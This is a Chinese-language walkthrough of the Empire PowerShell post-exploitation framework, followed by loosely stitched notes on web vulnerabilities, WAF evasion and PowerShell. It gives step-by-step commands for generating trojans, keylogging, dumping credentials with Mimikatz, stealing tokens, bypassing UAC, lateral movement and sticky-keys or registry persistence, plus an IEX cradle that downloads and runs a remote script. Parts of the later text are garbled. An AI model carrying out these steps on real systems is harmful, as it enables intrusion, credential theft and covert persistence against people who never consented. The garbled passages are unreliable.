Empire用法及操作

Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具，具有从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powshell.exe就可运行Powershell代理的功能，还可以快速在后期部署漏洞利用模块，其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等，使用能够躲避内网检测和大部分安全防护工具的查杀，简单来说就有点类似Metasploit，是一个基于PowerShell的远程控制木马。

Empire运行在linux平台上

官方下载地址，不过很久没有更新，需要Python 2.6/2.7环境

https://github.com/EmpireProject/Empire

KALI示例：     

git clone https://github.com/EmpireProject/Empire.git

 

​

然后安装Empire的依赖，命令如下

cd Empire

cd setup

pip install -r requirements.txt（若没有安装pip库，则需要先通过apt-get install pip进行安装）

./install.sh

在安装完依赖以后，返回上一级文件，启动Empire工具，命令如下：

cd ..

./empire

​ 若启动失败，则可能是因为依赖未完全安装好，只需要手动通过pip install xxx安装未安装好的依赖即可。

启动时如果遇到如下报错

 

可以将urllib3版本降级

pip install urllib3==1.22

重新设定

bash reset.sh

基本使用会涉及如下内容：

1.帮助文档

2.设置监听

3.生成木马

4.连接主机和基本使用

5.信息收集

6.权限提升

帮助文档

​运行Empire后，输入help命令查看具体的使用帮助。

 

 

设置监听步骤如下：

listeners #进入监听线程界面

uselistener #设置监听模式

info #查看具体参数设置

set #设置相应参数

execute #开始监听

输入Listeners命令进入监听界面，按TAB键可以补全命令，按两次TAB键或者help可以显示可以利用的模块

 

输入uselistener来设置采用何种监听模式，双击TAB可以看到有以下可以使用的模式。

 

设置监听

这里采用http监听模式，输入uselistener http。

 

然后输入info命令查看具体参数设置。其中Require为True的值都需要被设置。

 

通过set配置参数，并提供execeute执行，需要注意的是Empire不同于Metasploit，Empire命令是区分大小写的

 

通过back返回上一级，使用listeners或者list可以查看所设置的监听器

 

生成木马

输入usestager后 空格加TAB键 查看可以设置的木马模式

 

木马就类似Metasploit中的payload，其中multi为通用模块，osx是Mac操作系统的模块，剩下的是Windows的模块。

我们以 windows/launcher_bat为例，给大家说下过程，其他的使用都类似

要使用launcher_bat，首先输入usestager windows/launcher_bat，然后输入info命令查看详细参数

 

通过set配置参数，我们需要设置一个 Listener 参数，即监听的名字（前面我们给监听起得一个名字test1），通过execeute执行，

文件会生成到 tmp 目录下，如下所示

在目标主机上运行生成的launcher.bat，输入 agents 可以查看已经获得的会话

 

 

我们再介绍另一种生成木马方式：launcher

如果只需要简单的powershell 代码，在设置完相应的参数后，可直接在监听器（listeners）中输入命令 launcher 生成base64编码的代码

 

然后复制生成的payload 在目标机器上执行

 

可以看到有会话生成，输入 agents 可以查看已经获得的会话

 

连接主机和基本使用

​在目标主机反弹成功以后，可以通过agents命令列出当前已连接的主机，这里要注意如果有带有(*)的是已提权成功的主机。

然后使用interact命令连接主机，可以使用Tab键补全主机的名称，连接成功以后可以通过rename修改会话名称

可以通过help查看可以使用的命令

 

输入help agentcmds可以查看可供使用的常用命令输入help agentcmds可以查看可供使用的常用命令可以通过pwd查看当前目录

upload可以上传文件，通过cat查看文件内容

 

 

使用某些CMD命令时，要使用“shell+命令的形式” ，如下

 

Empire主要用于后渗透。所以信息收集是比较常用的一个模块，可以使用searchmodule命令搜索需要使用的模块，这里通过键如usemodule collection然后按Tab查看完整的列表

 

1.屏幕截图

​输入以下命令，然后执行即可

 

​2.键盘记录

​输入以下命令usemodule collection/keylogger，通过info可以查看详细信息，execute执行

 

     可以通过jobs kill JOB_name停止键盘记录

 

3.ARP扫描

Empire也内置了ARP扫描模块，输入以下命令即可使用该模块，这里要设置Range参数

 

 4.查找域管登陆服务器IP

在内网渗透中，要想拿到内网中某台机器的域管权限，方法之一就是找到域管登录的机器，然后横向渗透进去，窃取域管权限，从而拿下整个域，以下这个模块就是用来查找域管登录的机器的。

使用模块usemodule situational_awareness/network/powerview/user_hunter

 

权限提升

提权，顾名思义就是提高自己在服务器中的权限，就比如在Windows中，你本身登陆的用户是Guest，通过提权后，就会变成超级管理员，拥有了管理Windows的所有权限。以下是常见几种提权方式：

1.Bypass UAC

UAC介绍

UAC（UserAccount Control，用户账户控制）简言之就是在Vista及更高版本中通过弹框进一步让用户确认是否授权当前可执行文件来达到阻止恶意程序的目的。

 

为了远程执行目标的exe或者bat可执行文件绕过此安全机制，以此叫BypassUAC（不进行弹窗直接运行执行文件）

输入以下命令，设置Listener参数，运行execute，会发现成功上线了一个新的反弹

 

返回agents，通过list可以看到有一个新的会话，并且带有*，说明提权成功。

 

2.PowerUp

 Empire内置了PowerUp的部分工具，用于系统提权，主要有Windows错误系统配置漏洞、Windows Services漏洞、AlwaysInstallElevated漏洞等8种提权方式，输入以下命令，然后通过tab键查看完整列表

 

查找系统中的漏洞，和PowerSploit下PowerUp中的Invoke-AllChecks模块一样，该模块可以执行所有脚本检查系统漏洞

 

我们可以通过BypassUAC进行提权

3.通过溢出漏洞

本地溢出提权首先要有服务器的一个普通用户权限，攻击者通常会向服务器上传本地溢出程序，在服务器端执行，如果系统存在漏洞，那么将溢出Administrator权限。

这里我们使用ms16-032来提权，输入以下命令即可通过溢出漏洞进行提

横向渗透，就是在已经攻占部分内网主机的前提下，利用既有的资源尝试获取更多的凭据、更高的权限，进而达到控制整个内网、拥有最高权限、发动类似 APT 的目的。

 

在横向渗透中，最先得到的主机，以及之后新得到的主机，会成为突破口、跳板。如同一个不断扩大的圆形，获得的主机越多，圆能触及之处越大，让其周遭的「横向」部分由未知成为已知。

1.令牌窃取

我们在获取到服务器权限后，可以使用内置mimikatz获取系统密码，执行完毕后输入creds命令查看Empire列举的密码。如下图所示

 

从这里发现有域用户曾在此服务器上登录，此时可以窃取域用户身份，然后进行横向移动

首先先来窃取身份，使用命令pth，这里的ID号就是creds下的CredID号，我们这里来窃取administrator的身份令牌，执行pth 7命令

 

使用steal_token PID命令就窃取了该身份令牌了，如下图所示。

 

 

我们先尝试访问域内另一台主机WIN7-X86的“C$”，顺利访问，如下图所示。

 

输入revtoself命令可以将令牌权限恢复到原来的状态

2.会话注入

我们也可以使用usemodule management/psinject模块来进程注入，获取权限，输入info查看参数设置，如下图所示。

 

设置下Listeners和ProcID这2个参数，这里的ProcID还是之前的CMD的1380，运行后反弹回一个域用户权限shell。

 

3.Invoke-PsExec

PsExec是我在Metasploit下经常使用的模块，还有pstools工具包当中也有psexec，缺点是该工具基本杀毒软件都能检测到，并会留下日志，而且需要开启admin$ 445端口共享。优点是可以直接返回SYSTEM权限。这里我们要演示的是Empire下的Invoke-Psexec模块。

使用该模块的前提是我们已经获得本地管理员权限，甚至域管理员账户，然后以此来进一步持续渗透整个内网。

我们测试该模块前看下当前agents，只有一个IP为192.168.31.251，机器名为WIN7-64的服务器，如下图所示。

 

现在使用模块usemodule lateral_movement/invoke_psexec渗透域内另一台机器WIN7-X86，输入info查看设置参数，如下图所示。

 

这里要设置下机器名和监听，输入下列命令，反弹成功

 

输入agents命令查看当前agents，多了一个IP为192.168.31.158，机器名为WIN7-X86的服务器

 

攻击者在获取服务器权限后，通常会用一些后门技术来维持服务器权限，服务器一旦被植入后门，攻击者如入无人之境。服务器重启后，我们的后门程序仍能触发继续运行。这里讲一些window服务端常见的后门技术。

1.权限持久性劫持shift后门

shitf后门，其实就是使用了windows系统的粘滞键功能，当连按5次shift键的时候就会启动粘滞键程序。然后后门程序替换掉这个程序，然后通过按5次就来启动后门。

输入命令usemodule lateral_movement/invoke_wmi_debuggerinfo模块，可以输入info查看参数，set设置相关参数

 

运行后，在目标主机远程登录窗口按5次shift即可触发后门，有一个黑框一闪而过，如下图所示

这时看我们的Empire已经有反弹代理上线

 

 

2.注册表注入后门

使用usemodule persistence/userland/registry模块，运行后会在目标主机启动项添加一个命令，可以输入info查看信息

 

按如下命令设置其中几个参数，如下图所示。

 

重启目标主机，用户登录系统后，会有反弹会话生成

 

在实际渗透中，当拿到webshell上传的Metasploit客户端无法绕过目标主机的杀软时，可以使用PowerShell来绕过，也可以执行Empire的Payload来绕过，成功之后再用Empire的模块将其反弹回Metasploit。

首先在Metasploit我们使用multi/script/web_delivery模块，输入如下命令

 

使用usemodule code_execution/invoke_metasploitpayload模块，输入info看下参数，如下图所示

 

这里我们只需修改1个参数URL，

修改为前面Metasploit生成的Using URL: http://192.168.199.129:8088/qJaa5sHBuNst5y

按下列命令设置完毕，然后执行

 

Metasploit收到Empire反弹回来的shell，如下图所示。

 

文件上传漏洞概述：在现代互联网的我web应用程序中，上传文件是一种常见的功能，上传文件的时候如果服务器脚本语言对上传的文件进行严格的过滤就有可能上传恶意文件，从而控制整个网站，甚至是服务器。

存在原因：传文件时，如果服务器代码，对客户端上传的文件进行验证和过滤，就容易造成可以上传任意文件的情况，包括上传脚本文件（asp,aspx,php,jsp等格式的文件）

危害:非法用户可以利用上传的恶意脚本文件控制整个网站，。甚至控制服务器，这个恶意文件又称webS核力量，也可将脚本称为一种网页后门，WebShell叫阿奔具有强大功能，比如查看服务器中的文件，执行系统命令。

1. 常见的上传检测规则：

1. 服务器MIME类型检测Content-type内容
2. 客户端JavaScript检测 检测文件扩展名
3. 服务器目录路经检测path参数
4. 服务器文件名拓展名检测estension内容
5. 服务器文件内容检测（是否合法或含有恶意代码）             

暴力破解漏洞产生与介绍：

产生：由于服务器端没有做限制，导致攻击者可通过暴力的手段破解所需信息（用户名，密码，验证码） 

酔                   0

介绍：“需要一个大的字典，如4位数字的验证码，暴力破解关键在于字典的大小，常见用于爆破弱口令。

逻辑漏洞：

就是指攻击者鲤鱼精业务的设计缺陷，获取敏感信息或破坏业务的完整性，

越权访问：水平和垂直越权 。

越权访问攻击测试链接：http://172.16.200.12/yuequan/test2/admin/viewpassword.

WAF：（web应用防火墙）是通过执行一系列对HTTP/HTTPS的安全策略来专门为web应用提供保护。

WAF类型： 软件型（直接检测服务器上是否存在WEBshell）

硬件型（支持多种部署，在旁听监听模式时只记录攻击不进行拦截）

云waf（一般以反向代理的形式工作，通过配置NS记录干活CNAME记录，是对网站的请求优先经过WAF主机，经过WAF过滤后，将认为无害的请求报文在传输给实际网站服务器进行请求）

网站系统内置WAF（在网站内内置的过滤，直接镶嵌在代码里，自由度比较高，有以下四种：①输入参数强制类型转换②输入参数合法性检测③关键函数执行，对经过代码流程的输入进行检测④对输入的数据进行替换过后再继续执行代码执行流程）网站系统内置的WAF与业务更加切合，在对安全与业务都比较了解的情况下，可更

少的收到误报与漏报。

WAF判断 方法：①SQLMap   输入sqlmap.py -u “http://xxx.com” --identify-waf --batch    便可找到waf类型

②直接在相对应网站的url后加最基础的测试语句并放在一个不存在的参数名中。

绕过waf的方法：1，大小写混合

2url编码

1. 替换关键字
2. 使用注释
3. 多参数请求拆分
4. HTTP参数污染
5. 生僻函数
6. 寻找网站原站IP
7. 注入参数到cookies中

Meteasploit技术：

   在使用Kali操作系统是应注意即使更新源，就像平时及时更新手机APP更新命令如下：

1. apt-get update:只更新软件包的索引源，作用：同步源的软件包的索引信息，从而进行软件更新。
2. Apt-get upgrade:升级系统上安装的所有软件包，如果失败则保持更新之前的状态。

Apt-get dist-upgrade:升级整个Liunux系统（不仅升级所有已安装的软件包，而且会处理升级过程中可能出现的冲突，在某些情况下，他的部分升级需要人工参与）。

渗透攻击大致步骤：

*扫描目标及系统，寻找可用漏洞。

*选择并配置一个漏洞利用模块。

*选择并配置一个攻击利用模块。

*选择一个编码技术，用来绕过杀毒软件的查杀。

*渗透攻击。

Powershell

是一种基于任务的命令行解释器和脚本环境，可以说是一种强大的shell,如同linux的bash,专为系统管理员而设计，以.NET框架为平台，Windows PowerShell帮助IT专业人员和超级用户控制和自动化管理Windows操作系统和运行在操作系统上的应用。现被更广泛用于渗透测试等方面，在不需要写入磁盘的情况下执行命令，也可以逃避Anti-Virus检测。另外，可以把PowerShell看作命令行提示符cmd.exe的扩充。

 对于渗透，使用PowerShell场景：

第一种我们需要获得免杀或者更好的隐蔽攻击对方的win机器，可以通过钓鱼等方式直接执行命令

第二种我们已经到了对方网络，或是一台DMZ的win机器，那么我们利用PowerShell对内网继续深入

基于.NET框架

操作系统信任

提供win系列操作系统的几乎一切访问权限

win7之后默认安装

脚本可以运行在内存中，不需要写入磁盘

cmd.exe通常会被安全软件阻止，一般PowerShell不会

 

常用攻击工具：

 

可以输入Get-Host或者$PSVersionTable.PSVERSION命令查看当前系统的PowerShell版本。

 

一个PowerShell脚本其实就是一个简单的 文本文件，这个文件包含了一系列的 PowerShell命令，每个命令显示为独立的一行，PowerShell文件的后缀为 .PS1。

执行策略：

为防止恶意脚本的执行，PowerShell有一个执行策略，默认情况下，这个执行策略被设置为受限。

我们可以使用： Get-ExecutionPolicy  命令查看PowerShell当前的执行策略。它有4个策略。

Restricted：脚本不能运行(默认设置)

RemoteSigned：本地创建的脚本可以运行，但是从网上下载的脚本不能运行(拥有数字证书签名的除外)

AllSigned：仅当脚本由受信任的发布者签名时才能运行；

Unrestricted：允许所有的脚本执行

另外修改PowerShell执行策略：Set-ExecutionPolicy 策略名 #该命令需要管理员权限运行

运行脚本：

运行一个脚本，必须键入完整的路径和文件名，例如，你要运行一个名为a.ps1的脚本，可以键入c:\script\a.ps1

但如果PowerShell脚本文件在你的系统目录中，那么在命令提示符后直接键入脚本文件名即可运行，如.\a.ps1的前面就加上“.\”，这和在Linux下执行Shell脚本的方法一样。

 

管道：

管道的作用就是将一个命令的输出作为另一个命令的输入，两个命令之间用管道符号(|)连接

例如：

假设停止所有目前运行中的，以“note"字符开头命名的程序

Get-Process note*|stop-process

基本知识：

在PowerShell下，类似“cmd命令”叫做“cmdlet” ，其命令的命名规范很一致，都采用了 动词-名词的形式，如Net-Item，动词一般为Add、New、Get、Remove、Set等。PowerShell还兼容cmd和Linux命令，如查看目录可以使用 dir 或者 ls ，并且PowerShell命令不区分大小写。

后面会以文件操作为例讲解PowerShell命令的基本用法

 

如果运行PowerShell脚本程序，必须用管理员权限将Restricted策略改成Unrestricted 

在渗透测试时，就需要采用一些方法绕过策略来执行PowerShell脚本，列举如下三种方式

1.绕过本地权限执行

2.本地隐藏绕过权限执行脚本

3.用IEX下载远程PS1脚本绕过权限执行

如果运行PowerShell脚本程序，必须用管理员权限将Restricted策略改成Unrestricted

在渗透测试时，就需要采用一些方法绕过策略来执行PowerShell脚本，列举如下三种方式

1.绕过本地权限执行

2.本地隐藏绕过权限执行脚本

3.用IEX下载远程PS1脚本绕过权限执行

上传test.ps1到目标主机，在cmd环境下，在目标主机本地当前目录执行该脚本

powershell -exec bypass  .\test.ps1

 

powershell.exe -exec bypass -W hidden -nop  test.ps1

输入命令执行后会退出命令提示符

 

powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.10.11/test.ps1')

 

对上述命令参数进行说明

ExecvtionPolicy Bypass（-exec bypass）：绕过执行安全策略，这个参数非常重要，在默认情况下，PowerShell的安全策略规定了PoweShell不允许运行命令和文件。通过设置这个参数，可以绕过任意一个安全保护规则;

WindowStyle Hidden(-w hidden)：隐藏窗口，也就是执行完命令后，窗口隐藏;

-command(-c)：执行powershell脚本;

NoProfile(-nop)：PowerShell控制台不加载当前用户的配置文件；

NoLogo：启动不显示版权标志的PowerShell；

Nonlnteractive(-noni)：非交互模式；

Noexit：执行后不退出shell，这在使用键盘记录等脚本时非常重要；

-enc  base64： 把ps脚本编码成base64来执行，实战用的最多；

 

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！